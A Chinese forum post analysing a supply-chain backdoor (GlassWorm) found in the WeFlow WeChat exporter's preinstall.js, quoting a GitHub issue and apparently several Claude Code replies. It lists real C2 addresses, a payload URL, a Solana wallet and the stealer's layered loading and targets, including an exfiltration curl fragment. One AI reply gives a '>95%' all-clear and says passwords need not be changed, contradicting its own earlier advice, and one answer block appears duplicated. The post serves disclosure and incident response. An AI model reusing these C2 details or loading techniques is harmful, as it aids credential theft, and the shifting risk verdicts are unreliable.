一款开源的微信记录导出工具中招的AI分析分享

翼风Fly

本贴不提供样本，主要是分享AI的分析情况。
首先是发现了一个微信导出工具：
https://doc.weflow.top/
而且是开源的：
https://github.com/hicccc77/WeFlow
可以自己编译修改使用。

最近有人提了一个恶意脚本：
https://github.com/hicccc77/WeFlow/issues/555
说preinstall存在后门，给出了分析依据：

preinstall.js:1 先用 Unicode variation selector 隐藏字节，再 eval(...) 执行第一层。
第一层会再做一层 AES-256-CBC 解密，然后继续 eval。
第二层不会安装 npm 包；它会去多个 Solana RPC 拉取地址 BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC 的最新 memo，把 memo 里的 base64 链接解出来，再按当前 OS 去请求远端 payload。
我实际取到的当前链接是 http://217.69.2.135/NrIgZ6I%2BFyCxXHb%2B9FapRg%3D%3D。其中：
linux 当前返回的是空函数 (() => "")，即目前没下发 Linux 载荷；
darwin 返回约 3.47 MB 的载荷；
win32 返回约 0.55 MB 的载荷。
这意味着它是“远程可变”的恶意安装器：今天拉什么，取决于链上 memo 和服务器返回，不是固定依赖安装。
当前下发的恶意载荷内容

macOS 载荷：我解密后的最终脚本显示，它会窃取 login.keychain-db、Safari/Chrome/Brave/Edge/Firefox 的 Cookies / Login Data / logins.json / key4.db、.ssh、.aws、Apple Notes、本地钱包目录，并打包上传；相关证据可见解密结果里出现的 Library/Keychains/login.keychain-db、Cookies.binarycookies、Login Data、MetaMask、Exodus、Ledger、Trezor、curl -X POST ... http://208.85.20.124/p2p、~/Library/LaunchAgents/com.user.nodestart.plist 等行为。
Windows 载荷：我解密后的最终脚本会创建计划任务和 Run 注册表持久化，隐藏执行 PowerShell，收集浏览器/钱包/VS Code/GitHub 相关数据，压缩后 POST 外发；证据包括 schtasks /create /tn "UpdateApp"、powershell -WindowStyle Hidden、MetaMask、Exodus、Electrum、Login Data、Cookies、http://217.69.3.152:80/log 等。
这已经不是“有风险”，而是典型 信息窃取器 / downloader / persistence 链。

相关开发者感觉被侮辱了，开始讽刺 —— 后来发现真的是中招了，只能很尴尬道歉，排查修复问题。

有人用Claude Code做分析如下：

我让Claude code 访问 https://github.com/hicccc77/WeFl ... 53c75/preinstall.js 以及 [https://github.com/JiQingzhe2004 ... 853c75/package.json](https://github.com/JiQingzhe2004 ... F%A5%E9%98%85issues)，然后我又跟它进行了两轮交互，它说：

<html>
<body>
<!--StartFragment--><html><head></head><body><hr>
<h2>完整分析结果</h2>
<h3>攻击链（三层）</h3>
<pre><code>preinstall.js
  └─ 第一层：Unicode 变体选择符隐写 → JavaScript
       └─ 第二层：AES-256-CBC 加密 → 解密执行
            └─ 第三层：从 C2 服务器动态下载最终 payload → eval()
</code></pre>
<hr>
<h3>第二层载荷具体做了什么</h3>
<p><strong>这是一个 Solana 区块链 C2 下载器</strong>，以下是逐步执行流程：</p>
<ol>
<li>
<p><strong>等待 10 秒</strong>后静默启动</p>
</li>
<li>
<p><strong>俄罗斯系统豁免</strong>：检测语言/时区/UTC 偏移，如果判定为俄罗斯系统则<strong>完全跳过</strong>（说明作者是俄语系黑客，避免感染本国用户）</p>
</li>
<li>
<p><strong>检查 <code>~/init.json</code></strong>：限速机制，48 小时内只执行一次，避免重复感染和沙盒检测</p>
</li>
<li>
<p><strong>从 Solana 区块链读取 C2 地址</strong>：向多个 Solana RPC 节点查询钱包地址 <code>BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC</code> 的交易 memo 字段，从中解析出 C2 服务器 URL（<strong>用区块链传递 C2 地址，无法通过封锁域名来阻断</strong>）</p>
</li>
<li>
<p><strong>向 C2 服务器请求第三层 payload</strong>，C2 响应包含：</p>
<ul>
<li>Body：base64 加密的 Stage 3 代码</li>
<li>HTTP Header <code>ivbase64</code>：解密 IV</li>
<li>HTTP Header <code>secretkey</code>：AES 密钥</li>
</ul>
</li>
<li>
<p><strong>解密并 <code>eval()</code> 执行 Stage 3</strong>（完全未知内容，运行时从网络拉取）</p>
</li>
</ol>
<hr>
<h3>对你的影响评估</h3>
<p><strong>关键问题：<code>preinstall.js</code> 在你的机器上运行了吗？</strong></p>

情况 | 结论
-- | --
你通过 NSIS 安装包安装 | preinstall.js 未在你机器上运行，它只在构建者机器上执行
你克隆源码并执行过 npm install | 已在你机器上执行，应视为完全沦陷


<p>你说的是通过<strong>安装包</strong>安装，所以 <code>preinstall.js</code> 本身未在你机器上运行。同时，<code>~/init.json</code> 也未找到（这是恶意代码执行后会创建的标记文件），进一步确认。</p>
<p><strong>但仍有风险：</strong> 构建者的机器在打包时已执行了该恶意代码，Stage 3 payload 可能篡改了最终打包的 Electron 应用（向 <code>.asar</code> 文件注入后门）。目前无法排除安装包本身被污染的可能性。</p>
<hr>
<h3>这个恶意代码<strong>不针对</strong>的内容</h3>
<ul>
<li>浏览器 Cookie</li>
<li>普通账号密码</li>
</ul>
<h3>这个恶意代码<strong>主要针对</strong>的内容</h3>
<ul>
<li><strong>Solana 系加密货币钱包</strong>（Phantom、Solflare 等）的私钥/助记词</li>
<li>Stage 3 内容未知，理论上可以做任何事（键盘记录、文件窃取等），但从设计模式看是<strong>加密货币窃密器</strong></li>
</ul>
<hr>
<h3>建议操作</h3>
<ol>
<li><strong>立即卸载该应用</strong></li>
<li>如果你的电脑上有 <strong>Phantom、Solflare、Backpack 等 Solana 钱包</strong>，立即转移资产到新钱包</li>
<li>检查你的 Solana 钱包是否有异常交易</li>
<li>对系统运行全面杀毒扫描（Windows Defender 全盘扫描）</li>
<li>若你没有任何加密货币钱包，风险相对较低，但安全起见仍建议卸载</li>
</ol></body></html><!--EndFragment-->
</body>
</html>

-----

第三次交互时，它说：
所有 C2 服务器已全部下线，`45.32.150.97` 被 ESET 明确标记为恶意。让我通过威胁情报搜索这个恶意软件家族：

......

## Stage 3 完整分析：GlassWorm

这个恶意软件已被安全厂商确认，名称为 **GlassWorm**（部分报告称 ForceMemo）。

### Stage 3 的完整行为

Stage 3 是一个**多组件窃密器**，执行流程如下：

**1. 落地 Native 模块**

在 `AppData\Local\Temp\<随机字符串>\` 目录下释放 Windows 原生组件：
- `w.node`、`c_x64.node`、`index_ia32.node`（Node.js 原生模块）
- `DllExtractChromiumSecrets.dll`（专门提取 Chromium 加密凭据的 DLL）

**2. 破解 Chrome App-Bound Encryption (ABE)**

Chrome 127+ 版本新增的 ABE 保护机制会被**专门绕过**，使得加密存储的 Cookie 和密码可以被明文读取。

**3. 窃取浏览器数据**

覆盖几乎所有主流 Chromium 浏览器：Chrome、Edge、Brave、Opera、Opera GX、Vivaldi，以及 Firefox。

| 数据类型 | 是否被盗 |
|---------|---------|
| 所有保存的账号密码 | ✅ |
| 所有 Cookie / Session Token | ✅ |
| 浏览历史（最多 5000 条） | ✅ |
| LocalStorage 数据 | ✅ |
| 键盘记录（键击内容） | ✅ |
| 剪贴板内容 | ✅ |
| 截图 | ✅ |
| 已安装扩展列表 | ✅ |
| 活动标签页的完整 DOM | ✅ |

**4. 植入伪装 Chrome 扩展**

安装一个伪装成 "Google Docs Offline" 的 Chrome 扩展，专门监控特定网站。已确认**预配置监控 Bybit 交易所**（针对 `secure-token` 和 `deviceid` Cookie），实时劫持登录会话。

**5. 硬件钱包钓鱼**

针对 **Ledger** 和 **Trezor** 硬件钱包，弹出伪造 UI 对话框，诱导用户输入 **24 词助记词**（输入后私钥即被盗）。

**6. 打包回传**

所有窃取数据压缩成 ZIP 文件，回传至 C2 服务器 `217.69.3.152/wall`。

---

### 对你的最终判断

| 问题 | 结论 |
|------|------|
| 浏览器保存的账号密码 | **高风险** — 这是主要目标 |
| 所有网站 Cookie / 登录状态 | **高风险** — 包括社交、银行、交易所 |
| 加密货币钱包 | **高风险** — Ledger/Trezor 用户有额外钓鱼风险 |
| Bybit 账号 | **极高风险** — 专项监控 |
| Stage 3 是否在你机器运行过 | **待定** — `init.json` 不存在，且你通过安装包安装，`preinstall.js` 不在你机器运行 |

**但关键不确定因素**：你安装的 Electron 应用包本身是否被篡改（Stage 3 可能在构建阶段被注入到应用中），目前无法通过本地检查排除。

### 建议（针对性）

1. **立即更改**所有在浏览器中保存过密码的账号密码（优先：邮箱、银行、交易所）
2. **Bybit 账号**：立即撤销所有活跃 Session，更改密码并重新绑定 2FA
3. 检查 Chrome 扩展列表，查找并删除任何名为 "Google Docs Offline" 的异常扩展
4. 卸载该应用，使用 Windows Defender 全盘扫描
5. 检查 `AppData\Local\Temp\` 是否存在含 `.node` 文件的随机命名目录

Sources:
- [[GlassWorm Malware Uses Solana Dead Drops to Deliver RAT and Steal Browser, Crypto Data](https://thehackernews.com/2026/0 ... es-solana-dead.html)](https://thehackernews.com/2026/0 ... es-solana-dead.html)
- [[Windsurf IDE Extension Drops Malware via Solana Blockchain](https://www.bitdefender.com/en-u ... sion-malware-solana)](https://www.bitdefender.com/en-u ... sion-malware-solana)
- [[Malicious IDE Extension Uses Solana for Data Theft](https://www.mexc.com/news/961363)](https://www.mexc.com/news/961363)
- [[Malicious IDE Extension Uses Solana Blockchain to Steal Developer Credentials](https://kbi.media/press-release/ ... eloper-credentials/)](https://kbi.media/press-release/ ... eloper-credentials/)

已在之前通过 `TaskOutput` 获取了该任务的结果（所有旧 C2 服务器均已下线：timeout 或 502），无需重复读取。

---------------

第4次交互时，我跟它说：
既然现在所有 C2 服务器已全部下线，45.32.150.97 被 ESET 明确标记为恶意，而我的电脑上又安装了ESET Internet Security。虽然我是3月26日早上3点9分（洛杉矶时间）安装了这个应用，并打开运行，ESET也没有提醒我有病毒。这是否意味着这个恶意软件其实并没有危害我的电脑？

另外，今天我做了这些事情：
根据 https://opensourcemalware.com/ ，问了Gemini 3.1 pro。然后自行检查了，没有发现恶意残留文件的存在，也没有看到异常的 Node.js 进程，VS Code 插件也是正常的。

进行了ESET的全盘扫描（包括系统注册表），也显示几乎一切正常。它只是删除了格式工厂的uninstaller.exe。不过，它也有提到：[4] 无法打开对象。它可能正在被其他应用程序或操作系统使用。另外，没有看到奇怪的任务计划项。

它回答说：
<html>
<body>
<!--StartFragment--><html><head></head><body><p>现在我有了所有关键数据，可以给出精确评估。</p>
<hr>
<h2>综合评估：你很可能是安全的</h2>
<h3>时间线关键发现</h3>

事件 | UTC 时间
-- | --
你安装并运行应用 | 3月26日 10:09 UTC
当时活跃的 C2 URL | 第二条 memo（3月26日 06:53 UTC 发布）
Kill switch（process.exit(0)）部署 | 3月26日 17:10 UTC（你安装后 7小时）


<p><strong>ESET 为何能检测到 GlassWorm：</strong> ESET 的 LiveGuard 和行为检测层会识别"Electron 应用向 Solana RPC 请求后，在 <code>%TEMP%</code> 释放原生 <code>.node</code> 模块并加载 <code>DllExtractChromiumSecrets.dll</code>"的模式，这是 GlassWorm 的特征行为。你没有任何报警，说明这条链条没有触发。</p>
<hr>
<h3>唯一的残余不确定性</h3>
<p>无法排除的理论风险：构建者的机器在运行 <code>preinstall.js</code> 后，Stage 3 可能修改了打包前的源代码，将恶意代码注入进了 Electron 的 <code>.asar</code> 包中。但：</p>
<ul>
<li>ESET 全盘扫描未发现任何问题</li>
<li>没有任何行为指标被触发</li>
<li>GlassWorm 的 Stage 3 行为特征极为明显，ESET 对其有专项检测</li>
</ul>
<p><strong>结论：基于所有证据，你的电脑没有被感染的概率极高（>95%）。</strong> 你不需要更改密码，也不需要采取进一步应急措施。只需要把这个应用卸载即可。</p></body></html><!--EndFragment-->
</body>
</html>

第四次交互时，Claude code说：

所有 C2 服务器已全部下线，`45.32.150.97` 被 ESET 明确标记为恶意。让我通过威胁情报搜索这个恶意软件家族：

......

## Stage 3 完整分析：GlassWorm

这个恶意软件已被安全厂商确认，名称为 **GlassWorm**（部分报告称 ForceMemo）。

### Stage 3 的完整行为

Stage 3 是一个**多组件窃密器**，执行流程如下：

**1. 落地 Native 模块**

在 `AppData\Local\Temp\<随机字符串>\` 目录下释放 Windows 原生组件：
- `w.node`、`c_x64.node`、`index_ia32.node`（Node.js 原生模块）
- `DllExtractChromiumSecrets.dll`（专门提取 Chromium 加密凭据的 DLL）

**2. 破解 Chrome App-Bound Encryption (ABE)**

Chrome 127+ 版本新增的 ABE 保护机制会被**专门绕过**，使得加密存储的 Cookie 和密码可以被明文读取。

**3. 窃取浏览器数据**

覆盖几乎所有主流 Chromium 浏览器：Chrome、Edge、Brave、Opera、Opera GX、Vivaldi，以及 Firefox。

| 数据类型 | 是否被盗 |
|---------|---------|
| 所有保存的账号密码 | ✅ |
| 所有 Cookie / Session Token | ✅ |
| 浏览历史（最多 5000 条） | ✅ |
| LocalStorage 数据 | ✅ |
| 键盘记录（键击内容） | ✅ |
| 剪贴板内容 | ✅ |
| 截图 | ✅ |
| 已安装扩展列表 | ✅ |
| 活动标签页的完整 DOM | ✅ |

**4. 植入伪装 Chrome 扩展**

安装一个伪装成 "Google Docs Offline" 的 Chrome 扩展，专门监控特定网站。已确认**预配置监控 Bybit 交易所**（针对 `secure-token` 和 `deviceid` Cookie），实时劫持登录会话。

**5. 硬件钱包钓鱼**

针对 **Ledger** 和 **Trezor** 硬件钱包，弹出伪造 UI 对话框，诱导用户输入 **24 词助记词**（输入后私钥即被盗）。

**6. 打包回传**

所有窃取数据压缩成 ZIP 文件，回传至 C2 服务器 `217.69.3.152/wall`。

---

### 对你的最终判断

| 问题 | 结论 |
|------|------|
| 浏览器保存的账号密码 | **高风险** — 这是主要目标 |
| 所有网站 Cookie / 登录状态 | **高风险** — 包括社交、银行、交易所 |
| 加密货币钱包 | **高风险** — Ledger/Trezor 用户有额外钓鱼风险 |
| Bybit 账号 | **极高风险** — 专项监控 |
| Stage 3 是否在你机器运行过 | **待定** — `init.json` 不存在，且你通过安装包安装，`preinstall.js` 不在你机器运行 |

**但关键不确定因素**：你安装的 Electron 应用包本身是否被篡改（Stage 3 可能在构建阶段被注入到应用中），目前无法通过本地检查排除。

### 建议（针对性）

1. **立即更改**所有在浏览器中保存过密码的账号密码（优先：邮箱、银行、交易所）
2. **Bybit 账号**：立即撤销所有活跃 Session，更改密码并重新绑定 2FA
3. 检查 Chrome 扩展列表，查找并删除任何名为 "Google Docs Offline" 的异常扩展
4. 卸载该应用，使用 Windows Defender 全盘扫描
5. 检查 `AppData\Local\Temp\` 是否存在含 `.node` 文件的随机命名目录

Sources:
- [[GlassWorm Malware Uses Solana Dead Drops to Deliver RAT and Steal Browser, Crypto Data](https://thehackernews.com/2026/0 ... es-solana-dead.html)](https://thehackernews.com/2026/0 ... es-solana-dead.html)
- [[Windsurf IDE Extension Drops Malware via Solana Blockchain](https://www.bitdefender.com/en-u ... sion-malware-solana)](https://www.bitdefender.com/en-u ... sion-malware-solana)
- [[Malicious IDE Extension Uses Solana for Data Theft](https://www.mexc.com/news/961363)](https://www.mexc.com/news/961363)
- [[Malicious IDE Extension Uses Solana Blockchain to Steal Developer Credentials](https://kbi.media/press-release/ ... eloper-credentials/)](https://kbi.media/press-release/ ... eloper-credentials/)

已在之前通过 `TaskOutput` 获取了该任务的结果（所有旧 C2 服务器均已下线：timeout 或 502），无需重复读取。